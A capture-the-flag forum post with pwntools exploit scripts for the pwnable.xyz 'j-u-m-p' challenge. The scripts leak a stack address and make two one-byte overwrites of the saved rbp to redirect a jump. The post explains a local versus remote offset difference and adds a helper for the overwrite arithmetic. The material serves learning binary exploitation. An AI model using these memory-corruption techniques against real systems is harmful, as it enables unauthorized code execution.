We can leak a stack address, and we can overwrite one byte of the saved rbp.
With the leak we know exactly where main's frame sits, so the plan is: compute rbp carefully, set its low byte so that the one-byte write at rbp-0x11 lands on the stack slot we want and turns it into the win function's address, then set rbp again so that rbp-0x8 is that same slot and the jmp goes through it.
It works locally but not remotely...
If I run it against Ubuntu 18.04 the exploit works, so it seems to be an offset difference.
ubuntu 20.04 (local)
```python
from pwn import *

# context.log_level = "debug"
# p = remote("svc.pwnable.xyz", 30012)
p = process("./j-u-m-p")
# gdb.attach(p)

def ovr_data(data):
    # the input that overflows into the saved rbp: 0x20 bytes of buffer,
    # then the single byte that lands on rbp's least-significant byte
    p.recvuntil(b"> ")
    p.send(data)

def st_leak():
    # menu option 3 prints a stack address (environ)
    p.recvuntil(b"> ")
    p.sendline(b"3")

st_leak()
p.recvuntil(b"0x")
leak = int(p.recv(12), 16)      # 12 hex digits: 0x7fxxxxxxxxxx
main_rbp = leak - 0x108         # environ -> main's rbp, measured locally on Ubuntu 20.04
target_ret = main_rbp - 0x8     # the slot that gets turned into the win function
log.info("environ: " + hex(leak))
log.info("main rbp: " + hex(main_rbp))
log.info("target addr: " + hex(target_ret))

# step 1: make rbp - 0x11 == target_ret, i.e. rbp = target_ret + 0x11.
# Only the low byte of rbp changes, so this needs (target_ret & 0xff) + 0x11 <= 0xff;
# if the stack happens to land higher, bytes() raises ValueError and the run must be repeated.
payload = b"A" * 0x20
payload += bytes([(target_ret & 0xff) + 0x11])
ovr_data(payload)

# menu input sent between the two overwrites
p.recvuntil(b"> ")
p.sendline(b"123")

# step 2: make rbp - 0x8 == target_ret, i.e. rbp = target_ret + 8 (main's original rbp),
# so the jmp reads the patched slot
payload = b"1"
payload += b"\x00"
payload += b"A" * 0x1e
payload += bytes([(target_ret & 0xff) + 8])
ovr_data(payload)

p.interactive()
```
ubuntu 18.04 (remote)
```python
from pwn import *

# context.log_level = "debug"
p = remote("svc.pwnable.xyz", 30012)
# p = process("./j-u-m-p")
# gdb.attach(p)

def ovr_data(data):
    # 0x20 bytes of buffer, then the byte that overwrites rbp's low byte
    p.recvuntil(b"> ")
    p.send(data)

def st_leak():
    # menu option 3 prints a stack address (environ)
    p.recvuntil(b"> ")
    p.sendline(b"3")

st_leak()
p.recvuntil(b"0x")
leak = int(p.recv(12), 16)
# Same script as the local one; the only change is the environ -> main rbp distance,
# which is 0xf8 on 18.04 instead of 0x108. That distance depends on the libc startup
# frames (and argv/envp count) of the target, so it has to be measured per environment.
main_rbp = leak - 0xf8
target_ret = main_rbp - 0x8
log.info("environ: " + hex(leak))
log.info("main rbp: " + hex(main_rbp))
log.info("target addr: " + hex(target_ret))

# step 1: rbp = target_ret + 0x11, so the one-byte write at rbp - 0x11 hits target_ret
payload = b"A" * 0x20
payload += bytes([(target_ret & 0xff) + 0x11])
ovr_data(payload)

p.recvuntil(b"> ")
p.sendline(b"123")

# step 2: rbp = target_ret + 8, so the jmp goes through rbp - 0x8
payload = b"1"
payload += b"\x00"
payload += b"A" * 0x1e
payload += bytes([(target_ret & 0xff) + 8])
ovr_data(payload)

p.interactive()
```
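The arithmetic behind the two one-byte rbp overwrites, as an added example (my code, not the original post's scripts and not the challenge binary). A single-byte overwrite can only change the least-significant byte of the saved rbp, so every rbp value the exploit wants must share the upper seven bytes with the value already on the stack; the scripts above silently depend on that and crash in `bytes()` when it does not hold. The helpers below derive main's frame from the leaked environ pointer, pick the byte for each step, and return `None` when the step would need a carry. The slots `rbp-0x11` and `rbp-0x8`, the two offsets 0x108 / 0xf8 and the payload layouts are taken from the post; that the saved rbp being overwritten is main's frame pointer is my assumption, and the leak values are constructed.

```python
# Added example: one-byte saved-rbp overwrite arithmetic for the j-u-m-p exploit.
# Not from the original post. Slots and offsets are the post's; the assumption
# that the overwritten saved rbp is main's rbp is mine.

# environ -> main rbp distance, as measured in the post for each environment
ENVIRON_TO_MAIN_RBP = {"ubuntu 20.04 local": 0x108, "ubuntu 18.04 remote": 0xf8}
WRITE_SLOT = 0x11   # the one-byte write lands at rbp - 0x11
JMP_SLOT = 0x08     # the jmp takes its target from rbp - 0x8


def frame_from_leak(leak, environ_to_rbp):
    """Return (main_rbp, target_ret): target_ret is the slot to redirect."""
    main_rbp = leak - environ_to_rbp
    return main_rbp, main_rbp - 8


def lsb_overwrite(current_rbp, wanted_rbp):
    """Byte to put over the low byte of current_rbp so it becomes wanted_rbp,
    or None when the upper bytes would have to change (impossible with a
    single-byte overwrite)."""
    if (current_rbp >> 8) != (wanted_rbp >> 8):
        return None
    return wanted_rbp & 0xff


def apply_overwrite(current_rbp, byte):
    """What rbp holds after leave; ret: only the low byte changed."""
    return (current_rbp & ~0xff) | byte


def plan(leak, environ_to_rbp):
    """The two overwrite bytes, or None if this stack placement needs a carry
    (re-run the target: ASLR will pick a different low byte)."""
    main_rbp, target = frame_from_leak(leak, environ_to_rbp)

    # step 1: rbp - WRITE_SLOT must equal target, so rbp = target + 0x11
    b1 = lsb_overwrite(main_rbp, target + WRITE_SLOT)
    if b1 is None:
        return None
    rbp_after_1 = apply_overwrite(main_rbp, b1)

    # step 2: the next call saves the corrupted rbp; overwrite its low byte so
    # that rbp - JMP_SLOT == target, i.e. rbp == target + 8 == main_rbp again
    b2 = lsb_overwrite(rbp_after_1, target + JMP_SLOT)
    if b2 is None:
        return None
    return b1, b2


def payloads(leak, environ_to_rbp):
    """Both inputs in the layout the post's scripts send, or None on carry."""
    p = plan(leak, environ_to_rbp)
    if p is None:
        return None
    b1, b2 = p
    first = b"A" * 0x20 + bytes([b1])
    second = b"1" + b"\x00" + b"A" * 0x1e + bytes([b2])
    return first, second


if __name__ == "__main__":
    # constructed leaks, not values captured from the service
    good_leak = 0x7ffd12345678
    carry_leak = 0x7ffd12345700   # main_rbp low byte 0xf8: +0x11 would carry
    for name, off in ENVIRON_TO_MAIN_RBP.items():
        print(name, hex(good_leak), plan(good_leak, off))
    print("carry case:", plan(carry_leak, ENVIRON_TO_MAIN_RBP["ubuntu 20.04 local"]))
```

The carry case is the reason a run can fail even with a perfect leak: when main's rbp ends in 0xf8, `target_ret + 0x11` crosses into the next 0x100 page of the stack and no single byte can reach it, so the post's `bytes([(target_ret & 0xff) + 0x11])` raises `ValueError`; the right response is simply to reconnect and try again.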